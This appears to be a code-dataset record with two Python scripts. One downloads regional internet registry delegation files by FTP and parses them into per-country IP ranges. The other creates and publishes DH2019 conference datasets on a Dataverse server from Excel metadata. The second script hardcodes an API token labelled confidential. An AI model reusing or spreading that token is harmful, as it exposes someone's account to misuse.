"ftp://ftp.ripe.net/ripe/stats/delegated-ripencc-extended-latest",
# Africa
"ftp://ftp.afrinic.net/pub/stats/afrinic/delegated-afrinic-extended-latest",
# Asia & Pacific
"ftp://ftp.apnic.net/pub/stats/apnic/delegated-apnic-extended-latest",
# Latin-America
"ftp://ftp.lacnic.net/pub/stats/lacnic/delegated-lacnic-extended-latest",]
@lru_cache(None)
def _split_url(url):
"Split delegate url into host, file_path and file_name."
url = urllib.parse.urlparse(url)
host = url.netloc
file_path, file_name = url.path.rsplit('/', 1)
return (host, file_path, file_name)
def _file_details(ftp, file_name):
"Retrieve details of the file."
details = None
print('# Retrieving file details')
try:
listing = list(ftp.mlsd())
print('# Server support mlsd, extracting details ...')
for entry in listing:
name, facts = entry
if name.lower() == file_name.lower():
details = facts
details['name_local'] = name
details['name_remote'] = name
break
except ftplib.error_perm:
print('# Server does not support mlsd, falling back.')
tmp = list()
ftp.retrlines('LIST %s' % file_name, callback=tmp.append)
if '->' in tmp[0]:
print('# Fall back: entry is a symbolic link, following ...')
link2name = tmp[0].split('->')[1].strip()
tmp = list()
ftp.retrlines('LIST %s' % link2name, callback=tmp.append)
details = dict()
tmp = tmp[0]
tmp = tmp.rsplit(' ', 1)[0]
details['name_local'] = file_name
details['name_remote'] = link2name
tmp, details['size'], month, day, time = tmp.rsplit(' ', 4)
details['modify'] = '_'.join([month, day, time.replace(':', '')])
return details
def download(url):
"Download the url."
host, file_path, file_name = _split_url(url)
print('# Connecting to: %s' % host)
ftp = ftplib.FTP(host)
print('# Logging in ...')
ftp.login()
print('# Changing cwd to: %s' % file_path)
ftp.cwd(file_path)
details = _file_details(ftp, file_name)
file_cache = '_'.join([details['name_local'],
details['size'],
details['modify']])
file_cache += '.csv'
if file_cache in os.listdir(TWD):
print('# File is already downloaded !')
return
print('# Downloading ...')
retr = 'RETR %s' % details['name_remote']
local_file = os.path.join(TWD, file_cache)
ftp.retrbinary(retr, open(local_file, 'wb').write)
print('# Downloaded!')
# The parsing part of the program
def _address_range_ipv4(address, width):
"Convert IPv4 address and amount to integer range."
# The width of ipv4 addresses is given in number of addresses which
# are not bounded by exact netmasks for example a width of 640 addresses.
blocks = address.split('.')
for index, block in enumerate(blocks):
blocks[index] = bin(int(block, 10))[2::].zfill(8)
blocks = ''.join(blocks)
network = int(blocks, 2)
broadcast = network + int(width) - 1
return(network, broadcast)
def _ipv6_to_int(ipv6_address):
"Convert an IPv6 address to an integer"
packed_string = socket.inet_pton(socket.AF_INET6, ipv6_address.exploded)
return int(hexlify(packed_string), 16)
def _address_range_ipv6(address, width):
"Convert IPv6 address and broadcast to integer range."
network = ipaddress.ip_network(address+'/'+width)
broadcast = _ipv6_to_int(network.broadcast_address)
network = _ipv6_to_int(network.network_address)
return(network, broadcast)
def _address_range(ipv, address, width):
"From an IP address create integers for the network and broadcast IP"
# This is essentially the range which in between an IP address is.
if ipv == 4:
# IPv4, the width is given as the number of IPs
network, broadcast = _address_range_ipv4(address, width)
else:
# IPv6, width is given by a netmask.
network, broadcast = _address_range_ipv6(address, width)
return (network, broadcast)
def _parse_row(row):
"Parse and modify the row."
columns = row.strip().split('|')
# If there isn't more then 6 columns I can't parse it, so skipping it.
if len(columns) > 6:
tmp = columns[:5]
if len(tmp[1].strip()) == 0:
# This is the country it is assigned to, if there is no country
# I am not interested in it.
return None
if tmp[2].strip().lower() not in ['ipv4', 'ipv6']:
# If the protocol is not an IP protocol (such as asn), I am not
# interested.
return None
if '6' in tmp[2]:
tmp[2] = 6
else:
tmp[2] = 4
# Convert the IP address and netmask/number of IP's to an IP range where
# the IPs are converted to a numerical value.
tmp[3], tmp[4] = _address_range(tmp[2], tmp[3], tmp[4])
return tmp
class CompactRanges(object):
"Try to compact the ranges."
def __init__(self):
self.ranges = list()
def add(self, *newer):
"Add a line to the ranges, compacting where possible."
# nic, tld, ipv, network, broadcast = *newer
newer = list(newer)
if len(self.ranges) == 0:
self.ranges.append(newer)
return
# Testing if current range is a continuation of the previous one
older = self.ranges[-1]
if older[0] == newer[0] and \
older[1] == newer[1] and \
older[2] == newer[2] and \
older[4] == newer[3] - 1:
# The older broadcast is the same as newer network - 1, thus is is a
# continuation, so extending the range of the older one.
self.ranges[-1][4] = newer[4]
else:
self.ranges.append(newer)
def length(self):
"return length of ranges"
return len(self.ranges)
def _local_file_from_url(url):
"Open the file, if available from the url"
file_name = _split_url(url)[2]
candidates = list()
for candidate in os.listdir(TWD):
if file_name.lower() in candidate.lower():
candidates.append(candidate)
candidates.sort(reverse=True)
if len(candidates) == 0:
print('# No files to parse')
return None
file_full = os.path.join(TWD, candidates[0])
return file_full
def parse_latest(url):
"Parse a file as it has been retrieved from the url."
file_name = _local_file_from_url(url)
if file_name is None:
print('# No files available to parse !')
return
print('# Opening file: %s' % file_name)
compacted = CompactRanges()
count_linesall = 0
count_relevant = 0
with open(file_name, 'r') as file_open:
for row in file_open:
count_linesall += 1
parsed = _parse_row(row)
if parsed is None:
continue
count_relevant += 1
compacted.add(*parsed)
print('# Parsed %s lines' % count_linesall)
print('# - of which relevant: %s' % count_relevant)
print('# - reduced to ranges: %s' % compacted.length())
return compacted.ranges
def _compact_string(text):
"try making text compacter"
# we go through the text and try to replace repeated characters with:
# _c_n_ where c is the character and n is the amount of if. The underscore
# in this context is guaranteed to not occur in text. As such we can use
# it as an escape character.
# Also we do not collapse if repeated character is below 5.
tmp = list()
last = ''
count = 0
for character in text+'_':
# Add the underscore so we make sure not to miss the last bit of the
# string if it happens to end on more then 4 identical characters.
count += 1
if character != last:
if count > 4:
tmp = tmp[:len(tmp)-count]
tmp.append('_%s_%s_' % (last, count))
count = 0
last = character
tmp.append(character)
# Remove the appended underscore before returning.
return ''.join(tmp)[:-1]
def get():
"Fetch and parse data"
print('#'*79)
print('# Fetching data from regional NICs.')
print('#'*79)
tmp = list()
for delegate in DELEGATES:
print('# Using: %s' % delegate)
download(delegate)
tmp += parse_latest(delegate)
print('#' * 79)
print('# A total of %s IP ranges have been defined.' % len(tmp))
for nic, country, ipv, network, broadcast in tmp:
hex_network = hex(network)[2::].zfill(32)
hex_broadcast = hex(broadcast)[2::].zfill(32)
rid = nic[:2]+country+str(ipv)+hex_broadcast+hex_network
rid = rid.lower()
rid = _compact_string(rid)
yield rid, nic, country, ipv, hex_network, hex_broadcast
| 32.120275
| 80
| 0.609714
| 1,252
| 9,347
| 4.450479
| 0.241214
| 0.021536
| 0.007897
| 0.008615
| 0.061019
| 0.008615
| 0
| 0
| 0
| 0
| 0
| 0.014773
| 0.27581
| 9,347
| 290
| 81
| 32.231034
| 0.808391
| 0.221461
| 0
| 0.11165
| 0
| 0.019417
| 0.199182
| 0.043084
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072816
| false
| 0
| 0.038835
| 0
| 0.18932
| 0.106796
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34bb5b87da16431c41b077d93418d9a992f6e4d0
| 6,281
|
py
|
Python
|
src/dh2019dataverse.py
|
Mish-JPFD/DAPIload
|
d1f2c0e9832e6731c7e98f03481712db765e9af6
|
[
"MIT"
] | null | null | null |
src/dh2019dataverse.py
|
Mish-JPFD/DAPIload
|
d1f2c0e9832e6731c7e98f03481712db765e9af6
|
[
"MIT"
] | null | null | null |
src/dh2019dataverse.py
|
Mish-JPFD/DAPIload
|
d1f2c0e9832e6731c7e98f03481712db765e9af6
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Author : Jacques Flores
Created : October 17th,2019
About: Script for creating datasets in Dataverse.
An Empty JSON file with Dataverse structure is imported and converted into a JSON dict
Metadata is imported from an excel file into a pandas dataframe and written into the empty JSON formatted string.
"""
from pyDataverse import api
from pyDataverse.utils import read_file_json
from pyDataverse.utils import dict_to_json
import pandas as pd
import copy
def create_datasets(dataverse, xl, template):
dataset = 0
entries = xl['paperID'].count()
handles_list = []
while dataset < entries:
#Make a copy of the dataverse json template as metadata
metadata = copy.deepcopy(template)
#Store metadata from excel into variables
authorname = xl.loc[:, xl.columns.str.endswith('name')]
authoraffiliations = xl.loc[:, xl.columns.str.endswith('organisation')]
contactname = xl.loc[dataset,'submitting_author']
title = xl.loc[dataset]['title']
contactemail = xl.loc[dataset]['authors_formatted_1_email']
subject = 'Arts and Humanities'
poster = xl.loc[dataset]['contribution_type'] == 'Poster'
fileid = xl.loc[dataset]['paperID']
#modify metadata
#title
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][0]\
['value'] = title
#Authorname and affiliation
for author, affiliation in zip(authorname.iloc[dataset].dropna(), authoraffiliations.iloc[dataset].dropna()):
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][1]\
['value'].append({\
'authorName': {'value': author , 'typeClass': 'primitive', 'multiple': False, 'typeName': 'authorName'},\
'authorAffiliation':{'value': affiliation , 'typeClass': 'primitive', 'multiple': False, 'typeName': 'authorAffiliation'}})
#E-mail contact
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][2]\
['value'][0]['datasetContactEmail']['value'] = contactemail
#Dataset contact name
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][2]\
['value'][0]['datasetContactName']['value'] = contactname
#Description
if poster:
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][3]\
['value'][0]['dsDescriptionValue']['value'] = "Abstract and poster of paper %s presented at the Digital Humanities Conference 2019 (DH2019), Utrecht , the Netherlands 9-12 July, 2019." % fileid
else:
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][3]\
['value'][0]['dsDescriptionValue']['value'] = "Abstract of paper %s presented at the Digital Humanities Conference 2019 (DH2019), Utrecht , the Netherlands 9-12 July, 2019." % fileid
#Subject (controlled vocabulary: only set values are allowed; check dataverse for these )
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][4]\
['value'][0]= subject
#converting dictionary into a json formatted string
metadata1 = dict_to_json(metadata)
#creating Dataset in "RDMtest"dateverse with metadata and print response
dset = dataverse.create_dataset( "DH2019", metadata1)
print ('-' * 40)
print (dset.json())
print (dset.status_code)
#store persistent identifier from newly created dataset
handle = dset.json()['data']['persistentId']
handles_list.append((handle,fileid))
#upload files ( I had to edit the api upload file function (pkg: pydataverse) cause it kept raising an error, as a result it does not return a response)
#if there is a poster it will upload the abstract and the poster ELSE it will only upload the abstract
#The abstarct should be named as " (paperID).pdf [e.g. 100.pdf] and the poster as "paperIDp.pdf" [e.g. 100p.pdf] for it to work.
#If named differently this can be changed below
if poster:
dataverse.upload_file(handle , 'filesa/%sa.pdf' % (fileid))
dataverse.upload_file(handle , 'filesa/%sp.pdf' % (fileid))
else:
dataverse.upload_file(handle , 'filesa/%sa.pdf' % (fileid))
#publish dataset and print response
pubdset = dataverse.publish_dataset(handle, type = "major", auth = True)
print ('-' * 40)
print (pubdset.json())
print (pubdset.status_code)
#Counter for datsets and emptying metadata template
dataset = dataset + 1
metadata = {}
return(handles_list)
def publish_datasets(dataverse, handles_list) :
#publish dataset and print response
dataset = 0
entries = handles_list[0].count()
while dataset < entries:
handle = handles_list.iloc[dataset][0]
pubdset = dataverse.publish_dataset(handle, type = "major", auth = True)
print ('-' * 40)
print (pubdset.json())
print (pubdset.status_code)
# Confidential API Token (Do Not Distribute) ****last four digits removed)
apitoken = "38404b17-46f9-4fe5-808e-a4a38bd80aea"
# Demo Dataverse server
dtvserver = "https://dataverse.nl"
#Loading connection and authentication
dataverse = api.Api(dtvserver,apitoken)
#reading json file as dict
template = read_file_json('dataversetemplate.json')
#read excel file with metadata as pandas dataframe
xlfile = "DH2019_paperswithfiles.xlsx"
xl = pd.read_excel(xlfile, converters={'paperID': str})
handles = create_datasets(dataverse, xl, template)
handles_df = pd.DataFrame(handles)
handles_df.to_excel("handles.xlsx")
| 44.864286
| 215
| 0.603566
| 656
| 6,281
| 5.724085
| 0.347561
| 0.009321
| 0.067111
| 0.082024
| 0.319308
| 0.216778
| 0.203462
| 0.203462
| 0.150732
| 0.150732
| 0
| 0.021623
| 0.285783
| 6,281
| 139
| 216
| 45.18705
| 0.815426
| 0.245343
| 0
| 0.306667
| 0
| 0.026667
| 0.241181
| 0.023374
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026667
| false
| 0
| 0.066667
| 0
| 0.093333
| 0.12
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|